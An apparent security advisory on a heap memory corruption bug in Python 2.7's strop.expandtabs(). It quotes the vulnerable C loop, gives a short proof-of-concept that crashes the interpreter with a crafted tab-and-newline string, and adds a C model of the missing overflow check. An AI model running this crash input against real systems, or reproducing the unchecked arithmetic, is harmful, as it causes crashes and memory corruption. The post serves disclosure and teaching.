
  • Python Interpreter Heap Memory Corruption

    Recently a new fix has been pushed to the official Python source code repository (http://hg.python.org/cpython/rev/5dabc2d2f776) which fixes a memory corruption vulnerability in the Python interpreter's strop module. The vulnerability lies in the expandtabs() function.
    This is due to a missing check at lines 626 and 627 of /Modules/stropmodule.c.

    Vulnerable Code:

    Code:
      /* https://github.com/pgbovine/Py2crazy/blob/master/Python-2.7.5/Modules/stropmodule.c#L627 */

      for (p = string; p < e; p++) {
          if (*p == '\t') {
              j += tabsize - (j%tabsize);
              if (old_j > j) {
                  PyErr_SetString(PyExc_OverflowError,
                                  "new string is too long");
                  return NULL;
              }
              old_j = j;
          } else {
              j++;
              if (*p == '\n') {
                  // Missing check
                  i += j;
                  j = 0;
              }
          }
      }

    Patch Diff:
    http://hg.python.org/cpython/diff/5d.../stropmodule.c


    =================
    Proof of Concept:
    =================

    Running the code below will crash the vulnerable Python process.

    Code:
      import strop
      raw_input('Press Enter to BOOM!')
      a = '\t\n' * 65536
      strop.expandtabs(a, 65536)
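
The missing check in the loop quoted above, as an added example that is not part of the original post and is not the CPython patch: a stand-alone C model of the size pass run on the proof-of-concept input, next to a version that tests each addition before making it. The 32-bit counter width and the names size_unchecked, size_checked and tab_nl are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Excerpt's size pass; counters modelled as unsigned 32-bit (assumption). */
static uint32_t size_unchecked(const char *s, size_t n, uint32_t tabsize) {
    uint32_t i = 0, j = 0;
    for (size_t k = 0; k < n; k++) {
        if (s[k] == '\t') { j += tabsize - (j % tabsize); continue; }
        j++;
        if (s[k] == '\n') { i += j; j = 0; }   /* unchecked: i can wrap */
    }
    return i + j;
}

/* Same pass with every addition tested against INT32_MAX before it is made.
   Returns 0 and stores the size in *out, or -1 if it would not fit. */
static int size_checked(const char *s, size_t n, int32_t tabsize, int32_t *out) {
    int32_t i = 0, j = 0;
    if (tabsize < 1) return -1;
    for (size_t k = 0; k < n; k++) {
        int32_t incr = (s[k] == '\t') ? tabsize - (j % tabsize) : 1;
        if (j > INT32_MAX - incr) return -1;
        j += incr;
        if (s[k] == '\n') {
            if (i > INT32_MAX - j) return -1;   /* the check the loop lacks */
            i += j; j = 0;
        }
    }
    if (i > INT32_MAX - j) return -1;
    *out = i + j;
    return 0;
}

static char *tab_nl(size_t reps) {   /* constructed input: "\t\n" x reps */
    char *s = malloc(2 * reps);
    for (size_t k = 0; s && k < 2 * reps; k++) s[k] = (k % 2) ? '\n' : '\t';
    return s;
}

int main(void) {
    int32_t out = 0;
    char *s = tab_nl(65536);   /* same shape as the proof of concept */
    if (!s) return 1;
    printf("unchecked size: %u\n", (unsigned)size_unchecked(s, 131072, 65536));
    printf("checked result: %d\n", size_checked(s, 131072, 65536, &out));
    free(s);
    return 0;
}
```

With counters that wrap at 32 bits, the unchecked pass reports 65536 for an input whose expanded length is 65536 × 65537 bytes, which is why a buffer sized from that value is too small for the data written into it.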